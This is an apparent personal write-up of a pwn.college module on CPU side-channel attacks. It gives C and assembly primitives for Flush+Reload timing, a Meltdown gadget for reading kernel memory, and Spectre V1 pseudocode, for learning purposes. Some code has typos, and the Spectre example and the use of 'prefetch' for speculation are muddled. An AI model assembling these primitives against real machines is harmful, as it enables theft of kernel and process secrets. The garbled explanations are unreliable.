TL;DR

This article encapsulates the key skills and insights I gained from the ‘Microarchitecture Exploitation’ module at pwn.college. As a novice in this field, my grasp of the intricate details might not be exhaustive, and there could be inadvertent inaccuracies in my exposition. I warmly welcome any corrections or insights you might have.

For those aspiring to deepen their understanding of these exploitation techniques, I highly recommend the professional guide available on pwn.college. It offers a more comprehensive and expert perspective on the subject.

0x00 What’s Microarchitecture Exploitation

Microarchitecture is the way a given instruction set architecture (ISA) is implemented in a particular processor. –Wikipedia

The module is about the exploitation of the microarchitecture of x86 processors. It introduced several interesting processor features (prefetch and cache) and two famous microarchitecture exploitation methods (Meltdown and Spectre).

0x01 Prefetch

To make the CPU faster, the CPU will prefetch the data or instructions it doesn’t need at the current moment. In more detail, the instructions are not executed in order. The instructions are split into micro instructions and executed. The execution order is related to the dependencies of microinstructions. For example, the following assembly code could be split into two parts of microinstructions.

xor rcx, rcx    // Ins 0
xor rax, rax    // Ins 1
mov rax, [rax]  // Ins 2
mov rcx, [rdi]  // Ins 3

Not precise, just use this paragraph to help understanding

Part0: MicroIns from Ins0 and Ins3

Part1: MicroIns from Ins1 and Ins2

As we know, instruction 1 will set rax to 0, and instruction 2 will crash because of SegFault. However, accessing memory and delivering “SegFault” is slow, which means micro institutions in Part1 could be executed! This fact could be used in the following section and Meltdown section to design a way to leak any data on physical memory!

Also, we should notice that the microinstructions are at a lower level compared to assembly: when the CPU noticed that we crashed at instruction 2, the influence of instruction 3 will not be applied to register.

0x02 Cache & Flush and Reload

My understanding is quite naive for Cache: To make the CPU faster, the CPU will store some data, which is more likely to be used, in a faster storage space. This avoids the time to reload these data from memory. However, this could be used to side-channel attack and leak the data.

The side channel attack is based on the simple fact that “If some memory data is loaded in the cache, the reload time is shorter”. So we have the simple demo called “flush and reload”:

(Pseudocode)

// A secret byte
secret_byte = "*"

// Allocate 0x100 pages of memory
mem = allocate_chunk(0x100*PAGE_SIZE)

// This function will clean the whole cache
flush_the_cache()

// Load a page to cache
fetch [mem+secret_byte*PAGE_SIZE]

// Reload
time_cost = [0] * 0x100
for x from 0 to 0x100:
    time_cost[x] = measure_fetch_time(mem[ x * PAGE_SIZE ])

// Check and "Guess" the secret_byte
leaked_byte  = time_cost.min(time_cost)

In the above pseudocode, we designed a way to leak a byte by using the side-channel attack - the memory access time cost. The key idea is “if the data of one address is in the cache, the reloading would be faster”. So if our CPU working environment is not noisy, we can check the memory access speed and leak the secret byte.

Before heading to the next section, there are several very important instructions to implement the above pseudocode. Let’s split the whole attack into several primitives, including load/reload, flush, measure, and check_result.

load/reload

There are several ways to load/reload the data from memory to cache. The simplest in c language is just to assign the data on the address to a variable:

char load(size_t address){
    // Assign the address of the target address to a pointer
    char * pointer = address;
    // Load the value on that address to a variable as well as cache
    char c = * pointer; 
    return c;
}

In assembly language, we can simply load the data from memory to a register or use the instruction fetch to load the data to the cache.

Method 1:

mov rax, $address
mov al, [rax]

Method 2:

mov rax, $address
PREFETCHT0 [rax]

flush

In C language there is a function called _mm_clflush which is a wrapper of the assembly instruction clflush. So the C version and the assembly version are quite similar.

C Language:

void flush(size_t address){
    _mm_clflush(address)
}

Assembly Language:

mov rax, $address
clflush [rax]

Moreover, we have to make sure all probing bytes are not in the cache. So we have to perform flush multiple times. For example, in the previous demo, we used the first byte of every page as probes. Therefore, I wrote the flush functions in the following way:

void flush(size_t addr){
    for(int i = 0 ; i < 0x100 ; i++)
        _mm_clflush(i*0x1000+addr);
}

measure

Measure the access time of memory requires some functions to return the current time. To achieve a more precise and reliable timestamp, we use the C language function __rdtsc to get the Read Time-Stamp Counter. This function is a wrapper of assembly instruct rdtsc, which returns the current time stamp counter.

void measure(size_t addr){
    for(int i = 0 ; i < 0x100 ; i++)
        timing[i] = domeasure((size_t *)(i*0x1000+addr));
}

However, because of prefetch, we should avoid the following case: To improve the speed of CPU while executing instructions in a loop, people prefetch the instruction and data in the next round, which means when we are measuring the access time of i*0x1000+addr, (i+1)*0x1000+addr could be loaded to cache. This could result in imprecise results (smaller access time) so we need to figure out a way to avoid it. A useful way is to mess the the order of access to fool the CPU that it’s not in a loop.

void measure(size_t addr){
    for(int i=0;i<0x100;i++){
        int mess = (i*167+13)%0x100;
        timing[mess] = domeasure((size_t *)(mess*0x1000+garget));
    }
}

In domeasure, we should also be careful to prefetch since it may mess up the result. To make sure the instructions are executed in order, we need to apply fences to our code:

size_t domeasure(size_t* addr){
    _mm_mfence();  // Finish all load/store operations
    size_t start = __rdtsc();
    volatile size_t probe = *addr;
    _mm_lfence();  // Make sure accessing is finished
    size_t end = __rdtsc();
    return end - start;
}

The first mfence is used to give a “quiet” (not noisy) environment while performing reloading while the lfence is used to make sure the accessing is finished so we can get the timestamp counter.

Basically, we have three types of fence to control the execution flow:

mfence: memory fence, sfence plus lfence,_mm_mfence in C language
lfence: load fence, _mm_lfence in C language
sfence: store fence, _mm_sfence in C language

With the functions measure and domeasure we introduced above, we are able to achieve precise timing data.

Result Check

The result check function is designed to check the timing result and return the possible byte. It can be implemented to return a value whose accessing time is less than a threshold. Also, it’s also good to return the lowest access time item. This function varies for different cases since accessing time depends on the environment. Here is a simple version I implemented, which

size_t check(){
    size_t min_val = 0xFFFFFFFF;
    size_t res_idx = 0;
    for(int i=1 ; i < 0x100 ; i++){
        size_t val = timing[i];
        if(val<min_val){
            min_val = val;
            res_idx = i;
        }
    }
    if(min_val > 0xb0) // Threshold
        res_idx = 0x101; // 0x101 -> Fail.
    return res_idx;
}

Other Primitives

There are other primitives you may need to control the flow or make the environment not noisy: pin_cpu, segfault_handler, sgefault_register

pin_cpu: Make sure your process working on a specific CPU

// From ChatGPT
void pin_cpu(int cpu_number) {
    cpu_set_t mask;

    // Clear the CPU mask and set the desired CPU
    CPU_ZERO(&mask);
    CPU_SET(cpu_number, &mask);

    // Attempt to set the CPU affinity for the current process
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1) {
        perror("sched_setaffinity failed");
    }
}

segfault_handler and sgefault_register: Resgiter a user defined function to handle segmentfault.

Template Code:

static jmp_buf jb;

static void segfault_handler(int signum){
    (void) signum;
    sigset_t sigs;
    sigemptyset(&sigs);
    sigaddset(&sigs,signum);
    sigprocmask(SIG_UNBLOCK,&sigs,NULL);
    longjmp(jb,1);
}
void sgefault_register(){
    struct sigaction sa;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sa.sa_sigaction = segfault_handler;
    if (sigaction(SIGSEGV, &sa, NULL) == -1){
        perror("sigaction");
        exit(1);
    }
}
// Use `setjmp(jb);` to set the point where segfault_handler jumps

0x03 Meltdown

Meltdown Paper

An amazing side-channel attack method. Highly recommend reading the paper and its Github Repository.

Meltdown takes advantage of Prefetch, which also mixed race-condition. If there is no isolation between user space memory and kernel space memory, such as KPTI(Kernel Page-Table Isolation), we can kind of access kernel memory space from user space. I said “kind of access” because when the kernel notices that it’s in kernel space, it will forbid the accessing. However, as we talked about, by taking advantage of Prefect, we can construct the following code to build a side channel so that we are able to leak a byte in the kernel.

// $rsi -> Kernel Space Addr
// $rdi -> Allocated User Space (0x100 * 0x1000)
xor ecx, ecx
    mov rax, 0x1337
    mov rax, [rax] // Crash Here
// Prefetch ...
mov cl, [rsi]
shl rcx,  12
mov rdi, [rdi+rcx]

As the code above, on the assembly level, the instructions after mov rax, [rax] will not be executed. However, because of Prefetch, it’s actually executed at the micro-instruction level, which means the CPU loads the data on BYTE PTR[RSI] * 0x1000 + RDI to cache. Since $RDI is the address of user space memory we can later measure the accessing time of it to find out the slot that is in the cache. Plus that $RSI could be a kernel space address, we are able to leak any byte!

Considering there are pwn.college challenges (Lv11 and Lv12) in the module Microarchitecture Exploitation about Meltdown that you can use to practice Meltdown further, I don’t share my implementation here.

0x04 Spectre

Spectre Paper

My understanding of Spectre is kind of naive and it could be wrong.

Spectre also follows the template we used for Microachitechure Exploitation. The biggest difference is that it trains the processor and misleads processors to prefetch some code.

It’s usually divided into V1 and V2. V1 focuses on misleading processors to prefetch code on a not reachable branch. For example,

// Spectre V1
// Assume processes share memory MEM[0x100][0x1000]
char secret[0x10] = {0};
read(open("/secret"),secret,0x8);
int idx = 0 ; 
scanf("%d",&idx);
if((double)idx/8.0>=1.0){
    char probe = secret[idx];
    MEM[(size_t)probe][0] = 1;
}

In the above code, we added one if-statement to make sure the process can never load a secret byte to the cache. However, if we give enough valid idx(>=8), the processes will predict that we gonna run the code in the if block so they Prefetch and load the secret byte to cache. Similarly, for V2, we fool the processor to jmp/call the code can’t be reached at the assembly level. You can also find the corresponding examples on pwn.college-Microarchitecture Exploitation(Lv13 and Lv14).

0x05 Epilogue

I have not only worked on implementing Meltdown and Spectre vulnerabilities, but have also enjoyed the beauty of exploitation.

For me, this was the most challenging module on pwn.college. Prior to this, my knowledge of microarchitecture exploitation was quite limited. However, dedicating over 80 hours to these challenges has significantly expanded my understanding.

I’m very grateful for the guidance and support provided by @zolutal, @kyle, and @robwaz!